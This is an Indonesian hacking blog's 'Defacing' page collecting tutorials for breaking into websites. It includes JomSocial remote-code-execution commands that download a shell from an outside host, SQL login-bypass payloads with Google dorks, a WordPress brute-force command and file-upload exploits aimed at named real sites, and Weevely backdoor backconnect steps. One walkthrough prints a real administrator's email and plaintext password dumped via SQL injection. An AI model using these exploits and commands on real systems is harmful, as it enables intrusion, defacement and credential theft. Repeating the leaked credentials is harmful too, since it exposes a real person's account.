\

Featured

Browsing Category "Defacing"
Powered by Blogger.

Browsing "Older Posts"



Sudah lama tidak membahas mengenai deface mendeface, kesempatan kali ini admin akan memberikan trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :

JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

Pada komponen Jomsocial versi 2.6 terdapat bug Rce ( Remote Code Execution ) yang memungkinkan attacker mengeksekusi kode² berbahaya untuk mengeksploitasi web yg memakai komponen ini.

Bahan sebelum beraksi download bahannya :

Exploit
Python 27

Step- step :

♤ Install Python
♤ Open cmd
♤ Masuk dir dimana exploit berada
♤ Jalankan exploit


Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam opsi:
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru

♤ Cara tanam shell

trik a:
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

trik b:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"

Demikian artikel yang dapat kami berikan, artikel ini kami ambil dari User Sanjungan Jiwa di forum kami, jika ada kendala atau masalah saat menjalankan tutorial ini silahkan langsung menuju threadnya disini.

Trimakasih,
Thanks to : Sanjungan Jiwa

Author : Bimo Septiawan

JomSocial 2.6 - Remote Code Execution

By admin → Monday, March 31, 2014
Vega adalah scanner gratis dan open source dan platform penetration test untuk menguji keamanan aplikasi web. Vega dapat membantu Anda menemukan dan memvalidasi SQL Injection, Cross-Site Scripting (XSS),  mengungkapkan informasi sensitif, dan kerentanan lainnya. Scanner ini ditulis dalam bahasa Java, yang berbasis GUI, dan dapat berjalan pada Linux, OS X, dan Windows.

Vega mencakup scanner otomatis untuk pengujian secara cepat dan memiliki fitur proxy dalam pemeriksaan taktis. Vega scanner dapat menemukan XSS (cross-site scripting), injeksi SQL, dan kerentanan lainnya. Vega dapat dikembangkan dengan menggunakan API dalam bahasa web: Javascript.

FETURES

Modules
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Directory Traversal
  • URL Injection
  • Error Detection
  • File Uploads
  • Sensitive Data Discovery
Core
  • Automated Crawler and Vulnerability Scanner
  • Consistent UI
  • Website Crawler
  • Intercepting Proxy
  • SSL MITM
  • Content Analysis
  • Extensibility through a Powerful Javascript Module API
  • Customizable alerts
  • Database and Shared Data Model

Untuk menjalaankan scanner ini dibutuhkan aplikasi Java sebagai pendukung.


Download Subgraph Vega Web Vulnerability Scanner :

Subgraph Vega Web Vulnerability Scanner

By admin → Sunday, January 26, 2014
Assalamuallaikum sobat IDCA :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+

 

Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

Sekian tutorial dari saya thanks to Mr Xenophobic ^_^

untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk

Author : Bimo Septiawan

Tutorial Bypass SQL Login

By admin → Wednesday, January 22, 2014
IDCA - Brute force adalah tekhnik dimana attacker memaksa masuk ke halaman admin suatu website dengan memanfaatkan random password yang telah mereka kumpulkan.

Pada kesempatakn kali ini admin akan memposting tutorial tutorial dari teman teman IDCA di forum kami ( www.idca.or.id ). Oke langsung saja admin akan share tutorial Brute Force Wordpress dengan script python.

Untuk pengguna LINUX, python sudah terinstal, sedangkan untuk pengguna windows harus menginstalnya terlebih dahulu.


Jika sudah terinstal python maka copy script python berikut ini dan save dengan ekstensi .py. Dan juga download Wordlistnya lalu save satu folder dengan file python.


Setelah itu, tentukan target. Terserah mau acak atau mau pentest web yang sudah ditentukan.
Ketahui dulu user yang digunakan di website tersebut, agar nanti proses bruteforce tidak sia-sia. Untuk mengetahui daftar user di web target bisa kalian scan dengan Flunym0us. Untuk yang belum tau, baca tentang flunym0us di : Flunym0us, Vulnerability Scanner for Wordpress and Moodle

Oke sekarang kita masuk ke tutorialnya :

1. Buka CMD lalu masuk ke folder dimana kalian menyimpan file python tadi ( cd/folder ) jika suda masuk  ketikan
[namafile].py -h http://[situstarget]/wp-login.php -u [username -P [wordlist].txt
contoh wpbf.py -h http://www.adriannecurry.org/wp-login.php -u adamjohn -P akicha.txt  
[Image: nabilaholic404.png]

2.  Tunggu prosesnya hingga selesai, jika sudah selesai maka akan muncul tulisan seperti berikut

[Image: step1.png]


3. Nah jika sudah dapat passwordnya sekarang tinggal login ke website target.

  • login wordpress itu terdapat di "localhost/wp-login.php"

[Image: step2.png]

4. Jika sudah berhasil masuk sekarang terserah kalian akan kalian apakan website tersebut :)


Sekian tutorial yang dapat kami berikan, tutorial ini admin ambil di thread salah satu Thread yang dibuat oleh member Indonesian Cyber Army ( Nabilaholic404 )

Refrensi : disini
Author : Bimo Septiawan

Deface Dengan WordPress Brute Force

By admin → Tuesday, December 24, 2013
Assalamuallaikum Wr Wb. Pada kesempatan kali ini kami akan memberikan tutorial "Exploit Wordpress Optimize Press". Sebetulnya exploit lama sih tapi apa salahnya kita share lagi :D

[+] BAHAN [+]

1. Shell
2. Kesabaran :D
3. Dork : inurl:/wp-content/themes/OptimizePress/lib/admin/media-upload.php ( Bisa kalian kembangin lagi )

[+] PoC [+]

1. Ketikan dork ke google


2. Jika sudah memilih salah satu website, kasih exploit :
"localhost/path/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
maka hasilnya akan seperti ini :
 

3. Setelah itu scroll ke bawah sampai ketemu tempat upload shell, lalu upload shell kalian. Jika berhasil akan muncul seperti dibawah ini.


4. Sekarang buka url yang muncul tadi di path 
"/home/path/public_html/wp-content/uploads/optpress/images_comingsoon/"
 
5. Nah sekarang tinggal upload script deface kalian :)

Nah udah tuh cuma itu aja, kalau belum juga dapat sabar aja ya masih ada ribuan web di google kok :)
Thanks !

Author : Bimo Septiawan

Exploit Wordpress Optimize Press

By admin → Friday, December 20, 2013
Assalamualaikum sobat IDCA, kesempatan kali ini kami akan memberikan tutorial "Back connect" dengan Weevely untuk netcat nanti tutorialnya bisa menyusul. Sebelum melangkah ke tutorialnya kita berkenalan dulu dengan backconnect itu sendiri :D .


Apa itu backconnect ?
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita.

Oke, sudah sedikit jelas kan? kita lanjut ke tutorial heheh untuk pengguna windows harus instal  module python-redline dulu jika ingin menggunakan weevely ^_^

Bahan-bahan :

1. PC / Laptop yang terkoneksi dengan Internet
2. Website yang sudah ditanam shell
3. File Backdoor

Langkah-langkahnya :

1. Buka terminal ( atau tekan CTRL + ALT + T ) , lalu ketikan
cd /pentest/backdoors/web/weevely/" kemudian tekan enter ( Tampilan )


 2. Setelah itu kita buat backdoors dulu dengan cara, ketik :
./weevely.py generate [ namafile.php ] , contoh : "./weevely.py generate 0000 bim.php" ( Tampilan )


3. Jika sudah dibuat maka akan muncul tulisan "[generate.php] Backdoor file 'bim.php' created with password '0000'." sekarang coba cek filenya di dir/folder "pentest/backdoors/web/weevely"



4. Sekarang tinggal upload file tersebut ke web yang akan kita back connect.

5. Jika sudah berhasil di upload sekarang kembali ke terminal tadi, lalu ketikan :
./weevely.py [url file backdoors] [password]" sebagai contoh :
./weevely.py http://bimo-cyber.com/tmp/bim.php 0000  ( Tampilan )

Selamat sekarang anda sudah terhubung ke server target, nah untuk tutorial rooting saya bagis setelah dapat WIFI ya hehehe. Jika ada yang kurang jelas silahkan tanyakan di grup kami aja ya, jangan lewat INBOX :)

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Author : Bimo Septiawan







Backconnect dengan Weevely [ Back|Track 5 R3 ]

By admin → Friday, November 1, 2013
Bismillahirrahmanirrahiim,

Sebelumnya saya mohon maaf, berhubung saya lagi males jadi saya ngasi tutorial yg saya copas dari blognya om MR. Xenopobic :D Selengkapnya, biar ga bingung karena tanpa ada gambarnya,,, silahkan kunjungi aja ke blognya Disini

buka website target, dan masukkan exploit berikut :

/xampp/lang.php?Hacked+By+Nicknamemu

nanti akan muncul sebuah pesan error, jika tidak ada pesan error itu artinya tidak vuln.

disini saya mendapatkan pesan error seperti ini :

lalu kita ganti "index.php" menjadi "lang.tmp"

selesai ^_^.

Sumber : Blognya Xenopobic :v

XAMPP Write Access Vulnerability

By admin → Wednesday, October 23, 2013


Assalamualaikum...


Sebelumnya saya sudah pernah membahas tentang Hack WHM, dan tutorial kali ini kita akan mengexploitasi bug yang terdapat pada web aplikasi WHMCS.. lalu pertanyaanya, apa bedanya WHM dan WHMCS??? Google sono :p :v

Thanks To : Mr. Xenophobic atas sumbangan targetnya untuk Tutorial ini :D
Dork :
intext:powered by whmcompletesolution
Pertama silahkan sobat mencari targetnya di google dengan memanfaatkan dork diatas.

Kemudian sobat diharuskan Register di web target.


Setelah Register, kita akan melakukan exploitasinya dengan menggunakan Exploiter berikut:
http://www.summer-radio.com/tmp/xe.php

Masukkan site target, email, dan password yg di daftarkan tadi, lalu klik Exploit!


Tunggu saja prosesnya, nanti akan muncul hasilnya :)


Setelah di dapat username,email, dan password admin, kemudian decrypt hashnya, utk decriptnya nya bisa sobat decrypt di md5decrypter.co.uk atau di web yang menyediakan service hash crack yang lain. ato bisa juga dengan Hashcat, dan lainnya yg udah dibahas diblog ini :)

Setelah password berhasil di decrypt, selanjutnya masuk ke halaman admin! contoh : http://site.com/whmcs/admin/login.php ), masukkan username & password admin dan login dah... setelah itu, terserah mo diapain... :)

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Content Creator : Onix AQua


Tutorial Exploit WHMCS 5.2.7 SQL Injection

By admin → Sunday, October 13, 2013
Assalamualaikum sobat IDCA, karena lagi males bikin artikel jadi mending langsung aja menuju link dibawah yah >_<


TUTORIAL ADA DISINI


Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Exploit WordPress Complete Gallery File Upload

By admin → Thursday, October 10, 2013
Assalamualaikum...

Lagi surfing di google, eh nemu yang beginian,, kocak! wkwkwkw ::D Yah, kali aja ada yang mau nyoba dan bisa dimanfaatin. :D yang ga berkenan, no komen aja :) Cukup simple aja..

Pertama gunakan dork untuk mencari Cpanelnya 
 inurl:":2082/login/?user="

Lalu masukkan dork ke box pencarian google, dan Enter.


Nah tinggal dibuka satu satu Cpanelnya yah :)


Maaf yah, kalo cuma begitu, lagi males ngapa2in :p Semoga bermanfaat aja :v

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/



Content Creator: Onix AQua

Cara Mendapatkan Banyak CPanel Dengan Mudah

By admin → Tuesday, October 8, 2013
Indonesian Cyber Army - Assalamualaikum, Berhubung saya juga pengguna Android, jadi sedikit saya berbagi bagaimana melakukan exploitasi web yang vulnerable terhadap SQLinjection dengan menggunakan aplikasi DroidSQLI. aplikasi ini sama halnya dengan Havij yang biasa digunakan di OS Windows, hanya saja mungkin fitur2nya yang membedakannya disini.


Silahkan sobat download dulu aplikasinya dan install ke OS Android Smartphone sobat, donlot aja melalui Playstore maupun sobat cari sendiri di google udah banyak :p

Note: Tidak semua website memiliki celah SQLi, So find them before exploiting :p

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua
Pertama, silahkan sobat cari aja target yang akan di exploitasi. gunakan dork atau pake apa aja terserah :p harap di cek dulu bahwa web yang akan diexploitasi tersebut memiliki bug/ celah / kerentanan terhadap SQLinjection. untuk mengetahuinya cukup mudah, sobat tinggal menambahkan tanda petik ( ' ) diakhir url. contoh target saya : http://www.eastodissa.ac.in/news-and-events.php?id=22' setelah ditambahin tanda petik ( ' ) maka akan muncul error yang menandakan bahwa web tersebut memiliki celah SQLinjection.  lihat gambar!


Kemudian masukan web target yang vuln SQLi ke Target Url lalu klik Inject!


Kalo proses injectnya berhasil, maka akan muncul Databasenya. silahkan pilih databasednya untuk mencari Tabel. dalam target saya disini nama databsenya adalah nilakantatrust.


Proses selanjutnya akan muncul Tabel, disini kita akan mencari letak user dan password admin. jadi saya memilih Table est_admin.


 Nah, dalam Tabel tersebut, ada beberapa column yang berisikan data admin. silahkan diceklish Column yang ingin di dump datanya. lalu klik Get Records


Maka akan muncul isi data yang ada pada column tersebut berupa data admin seperti email, username, dan password.


Nah dari column tadi kita dapatkan data yaitu:

Emailid : sswain@isandt.com
Last Loggin : 2013-09-26
Password : isti$$9!5!2013
Signature : Sanjay Kumar Swain
user id : trustadmin

Selanjutnya sobat tinggal mencari halaman adminnya, dan login ke panel admin. seandainya passwordnya berbentuk Hash, maka password tersebut harus di crack terlebih dahulu.Walaupun secara kasat mata, teknik ini sangat mudah apa lagi dengan menggunakan Automatic Tools, tapi cukup sulit juga. beberapa kasus dan kendala yang banyak dihadapi dalam melakukan SQLi yaitu  sulitnya menemukan halaman loggin serta password Hashnya. Disini kita banyak membutuhkan kesabaran dan ketekunan karena tidak ada yg mudah dalam dunia Hacking :p

Sekian tutorial yg dapat saya berikan, jika ada kekurangan mohon di perbaiki :) CMIIW :D semoga bermanfaat yah, wassalam.. :)


Content Creator : Onix AQua





SQL Injection Dengan DroidSQLi Di Android

By admin → Friday, October 4, 2013
Assalamualaikum Wr.Wb ketemu lagi dengan coretan saya yang semrawut hehe. :D
Kesempatan kali ini, saya akan share tutorial Deface yang dibuat oleh temen saya sendiri :D


Okay tanpa basa basi, langsung aja ke tutorialnya :D

#Dork : intitle:"intext:Website by MediaPie"

#POC :

Jika sudah menemukan target dengan dork tadi, pakai exploit diatas, sehingga menjadi :
www.target.com/admin/ajaxfilemanager/ajaxfilemanager/ajaxfilemanager.php

1. Jika sudah, kalian klik "Upload"

2. Jika sudah, pilih file .txt kalian ( karena hanya support txt saja )


3. Jika sukses, cara memanggil filenya yaitu :
http://site-target/admin_images/[YOURFILE]
Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 

Demo Target :

http://theenglishcaravancompany.com/
http://myholidaymonkey.com/
http://creativecouriers.com/ 
http://edenlondon.com/devsite/

This Exploit not support php, html , png, gif

Okay, udah itu ajaa :D
sebelum mengakiri tutorial hari ini, saya ucapkan trimakasih buat temen saya :D

Sumber : http://newbie-security.or.id/

Content Created By Garuda Dot ID


Arbitrary File Upload On MediaApie

By admin → Tuesday, October 1, 2013